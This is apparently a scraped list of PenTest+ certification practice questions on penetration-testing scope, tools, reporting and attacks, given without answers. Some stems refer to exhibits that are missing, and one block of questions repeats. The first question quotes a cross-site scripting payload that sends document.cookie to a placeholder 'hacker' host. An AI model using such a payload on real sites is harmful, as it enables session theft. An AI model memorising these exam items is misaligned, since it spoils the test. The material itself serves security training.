PenTest+

Given the following code: var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie; Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

A software development team is concerned that a new product’s 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

Which of the following tools provides Python classes for interacting with network protocols?

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future?

A penetration tester wants to scan a target network without being detected by the client’s IDS. Which of the following scans is MOST likely to avoid detection?

A penetration tester finds a vulnerable script that accepts unvalidated inputs allowing command injection. Which of the following actions should the tester take FIRST?

During a penetration test, a tester identifies an SQL injection vulnerability. What is the BEST way to report this finding to the client?

A tester needs to ensure confidentiality of sensitive data during transmission. Which of the following should the tester recommend?

A company has provided a penetration tester with authorized access to internal networks and systems. What is the MOST important action for the tester to take before starting the assessment?

What is the primary purpose of conducting a penetration test on a new network installation before it goes live?

A penetration tester has discovered that a server is vulnerable to an old SSL/TLS vulnerability. What is the BEST immediate action?

Which of the following tools is used to perform a brute force attack on a password?

A penetration tester is conducting a security assessment for a mobile application. Which of the following is the BEST method to protect sensitive information stored by the app?

What is the primary purpose of a Blue Team during a red team-blue team exercise?

During an assessment, a penetration tester finds that a company’s login page is vulnerable to a buffer overflow attack. What is the FIRST step the tester should take?

A security team is conducting a penetration test on their company’s applications to ensure compliance with security policies. What should the team do FIRST?

A penetration tester is using a public exploit tool to test for a common vulnerability. The tool reports no vulnerabilities, but the tester suspects the system is still vulnerable. What should the tester do next?

What is the most common goal of a denial-of-service attack performed during a penetration test?

Which of the following is a type of security testing that specifically identifies vulnerabilities in network protocols?

A penetration tester needs to provide evidence of a security breach that occurred in a client’s database system. What is the BEST way to gather this evidence?

During an investigation, an incident response team attempts to understand the source of an incident. Which of the following incident response activities describes this process?

A security practitioner completes a vulnerability assessment on a company’s network and finds several vulnerabilities, which the operations team remediates. Which of the following should be done next?

An administrator was notified that a user logged in remotely after hours and copied large amounts of data to a personal device. Which of the following best describes the user’s activity?

Which of the following allows for the attribution of messages to individuals?

A penetration tester is evaluating the security of a new web application. What is the FIRST action the tester should take?

A security consultant is designing a new infrastructure with a focus on high availability. Which of the following should be prioritized?

A network technician receives an alert from a network monitoring system. Which of the following is the FIRST step the technician should take?

A security analyst is assessing a small company’s network and notices that there is an unexpectedly high amount of traffic going to a file server. What should the analyst do NEXT?

Which of the following protocols is considered secure but vulnerable to downgrade attacks when configuring a web server?

During a security review, a tester notices that a system that stores sensitive information is accessible from the public internet. What is the MOST appropriate action?

A penetration tester finds that a network is vulnerable to an old protocol exploit. Which of the following should the tester recommend replacing it with?

A security professional is conducting a penetration test and identifies a potential threat. What is the NEXT step the professional should take?

An organization is preparing to deploy a new application. What is the MOST important security aspect to consider?

A security analyst is configuring tools for a network audit. Which of the following should the analyst configure FIRST?

A company’s security policies require that all sensitive data transmitted over the network must be encrypted. Which of the following should be implemented to ensure compliance?

Which of the following would be the BEST method for securely disposing of an old hard drive within an organization?

A penetration tester discovers a network shares accessible to all authenticated users. This share contains sensitive data. What should the tester do NEXT?

A company is considering implementing a new TCP/IP-based protocol for sensitive transactions. Which of the following would be the MOST secure option?

During a penetration test, a tester discovers a critical vulnerability that allows remote code execution. What is the FIRST action the tester should take?

Which of the following encryption methods does NOT provide forward secrecy?

A penetration tester is evaluating the security of a new online banking application. What is the FIRST action the tester should take?

A company requires its penetration testers to follow a strict methodology when conducting assessments. Which of the following is a primary reason for this requirement?

A penetration tester finds that a system is vulnerable to an old SSL/TLS vulnerability. What is the BEST immediate action?

Which of the following BEST describes a security risk that could arise from telecommuting?

A penetration tester needs to provide evidence of a security breach that occurred in a client’s database system. What is the BEST way to gather this evidence?

A penetration tester wrote the following script to be used in one engagement: Which of the following actions will this script perform?

The results of an Nmap scan are as follows: Which of the following device types will MOST likely have a similar response?

A penetration tester conducted an assessment on a web server. The logs from this session show the following: Which of the following attacks is being attempted?

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

A penetration tester is exploring a client’s website. The tester performs a curl command and obtains the following: Which of the following tools would be BEST for the penetration tester to use to explore this site further?

A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

A penetration tester ran the following command on a system: find / -user root -perm -4000 -print 2>/dev/null Which of the following is the tester trying to accomplish?

Which of the following tools provides Python classes for interacting with network protocols?

A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. Which of the following commands should the engineer use to achieve the objective in the least amount of time?

A penetration tester is performing a social engineering penetration test and was able to create a remote session. Which of the following social engineering techniques was most likely successful?

During an assessment, a penetration tester was able to get access on all target servers by attempting authentication using a service account key that was published on the intranet site as part of a standard procedure. Which of the following should the penetration tester recommend for this type of finding?

A penetration tester discovers that an organization’s infrastructure is hosted in the cloud. Which of the following technologies should the penetration tester explore for vulnerabilities?

Given the following table: Which of the following involves an attempt to take advantage of database misconfigurations?

An organization would like to store customer data on a separate part of the network that is not accessible to users on the main corporate network. Which of the following should the administrator use to accomplish this goal?

A penetration tester wrote the following script to be used in one engagement: Which of the following actions will this script perform?

The results of an Nmap scan are as follows: Which of the following device types will MOST likely have a similar response?

A penetration tester conducted an assessment on a web server. The logs from this session show the following: Which of the following attacks is being attempted?

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

A penetration tester is exploring a client’s website. The tester performs a curl command and obtains the following: Which of the following tools would be BEST for the penetration tester to use to explore this site further?

A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

A penetration tester ran the following command on a system: find / -user root -perm -4000 -print 2>/dev/null Which of the following is the tester trying to accomplish?

Which of the following tools provides Python classes for interacting with network protocols?

A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. Which of the following commands should the engineer use to achieve the objective in the least amount of time?

A penetration tester is performing a social engineering penetration test and was able to create a remote session. Which of the following social engineering techniques was most likely successful?

During an assessment, a penetration tester was able to get access on all target servers by attempting authentication using a service account key that was published on the intranet site as part of a standard procedure. Which of the following should the penetration tester recommend for this type of finding?

A penetration tester discovers that an organization’s infrastructure is hosted in the cloud. Which of the following technologies should the penetration tester explore for vulnerabilities?

Given the following table: Which of the following involves an attempt to take advantage of database misconfigurations?

An organization would like to store customer data on a separate part of the network that is not accessible to users on the main corporate network. Which of the following should the administrator use to accomplish this goal?

What is the main security concern when using third-party code libraries in application development?

Which of the following types of penetration tests focuses on evaluating the physical security of a location?

Which method is MOST commonly used to exploit a buffer overflow vulnerability?

A penetration tester is reviewing logs from a client’s firewall and notices a large amount of outgoing traffic to a known malicious IP address. What is the NEXT step the tester should take?

Which of the following is the BEST tool for conducting a wireless network penetration test?

A tester gains unauthorized access to a web application by exploiting an SQL injection vulnerability. What should the tester do NEXT?

Which of the following commands will return information about open ports on a Linux system?

A penetration tester is tasked with identifying vulnerabilities in a legacy web application. What is the FIRST tool the tester should use?

Which of the following is the primary purpose of fuzz testing during a penetration test?

A penetration tester is preparing to test a client’s network for vulnerabilities. Which of the following should the tester request from the client before beginning the test?

Which of the following methods is used to establish a covert communication channel?

A penetration tester is trying to evade detection by altering the signatures of payloads in a script. Which of the following techniques is the tester MOST likely using?

What is the primary goal of a red team exercise?

A penetration tester is conducting a physical security test and gains access to the server room by tailgating an employee. What is the tester simulating?

Which of the following BEST describes the purpose of lateral movement during a penetration test?

A security team is performing a web application penetration test and discovers that a specific user input field is vulnerable to cross-site scripting (XSS). What should the team do NEXT?

A tester uses a known vulnerability in a software package to execute arbitrary code. What is the tester MOST likely performing?

Which of the following tools is commonly used to conduct a DNS enumeration attack?

Which of the following is an effective method for testing the security of an organization’s internal network without disrupting normal operations?